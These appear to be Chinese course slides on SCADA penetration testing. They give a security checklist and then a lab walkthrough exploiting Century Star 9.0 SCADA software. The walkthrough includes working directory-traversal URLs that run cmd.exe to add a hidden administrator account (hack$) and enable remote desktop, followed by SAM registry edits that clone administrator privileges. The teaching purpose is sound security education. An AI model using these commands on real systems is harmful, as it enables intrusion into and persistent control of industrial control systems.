《工业互联网安全测试技术》课件- 09 SCADA渗透测试流程实例

工业互联网安全测试技术《工业互联网安全测试技术》课程组

IndustrialInternetSecurityTestingTechnologyGYHLWAQCSJS-009SCADA渗透测试流程实例第2章工控操作系统安全测试目录01SCADA渗透测试流程02SCADA渗透测试流程实例0101SCADA渗透测试流程SCADA渗透测试01SCADA渗透测试流程实例针对SCADA渗透测试流程如下列表几点所示：出厂默认设置是否修改是否设置了访问PLC的白名单SCADA网络与其他网络是否隔离是否可以通过物理方式访问SCADA控制中心控制机器是否可以访问互联网SCADA的网络传输是否是明文形式组织是否遵循严格的密码策略控制器、工作站以及服务器是否打了最新补丁是否运行有防病毒软件并且设置应用程序白名单0202SCADA渗透测试流程实例(1)漏洞信息02SCADA渗透测试流程实例漏洞名称AdvantechWebAccess信息泄露漏洞影响产品AdvantechWebAccess8.1

AdvantechWebAccess8.2

AdvantechWebAccess7.2CVEIDCVE-2016-5810漏洞描述AdvantechWebAccess存在信息泄露漏洞，低权限用户可以获得其它用户的密码，包括系统管理员的密码。

参考连接/ics/advisories/ICSA-16-173-01本节内容将讲解SCADA渗透是针对世纪星9.0SCADA组态软件的远程命令执行漏洞，漏洞信息如下：(2)配置世纪星配置世纪星进行web发布，默认情况下攻击者会对发布页面当作一条攻击的路线。直至达到持久性后期利用。02SCADA渗透测试流程实例(3)虚拟化系统配置XP虚拟机：38物理机：34；虚拟机运行世纪星工程，物理机IE浏览器链接web发布页面：02SCADA渗透测试流程实例(4)目录浏览使用“.../”可对WEBSERVER目录进行跳转，可对上层目录进行遍历，输入：http://IP/.../。如图：02SCADA渗透测试流程实例(5)扫描端口在XP虚拟机使用netstat-ano在cmd运行。排查端口是否关闭3389，之后的攻击中将会对目标开启3389端口：02SCADA渗透测试流程实例(6)远程创建用户例如软件默认安装位置为“C:\CenturyStar”，那么可以跳转目录到cmd的目录下对虚拟机主机进行任意命令如“http://IP地址/.../.../windows/system32/cmd.exe?/c+net+user+hack$+hack+/add&net+localgroup+administrators+hack$+/add”加隐藏管理用户等02SCADA渗透测试流程实例(7)扫描端口&远程连接同理执行这条命令开启3389端口，并尝试连接之前创建的hack$用户，连接成功。“http://IP地址/.../.../windows/system32/cmd.exe?/c+REG+ADD+HKLM\SYSTEM\CurrentControlSet\Control\Terminal""Server+/v+fDenyTSConnections+/t+REG_DWORD+/d+00000000+/f”02SCADA渗透测试流程实例(8)修改注册表使用创建好的用户(hack$)远程桌面登陆，并查看注册表下SAM文件，将administrator与hack的用户权限进行复制。02SCADA渗透测试流程实例(9)修改注册表通过注册表查导出注册表SAM下hack$的两个对应键值和users下第一个键值（这个是administrator的）将000003ed内“F”值替换成000001F4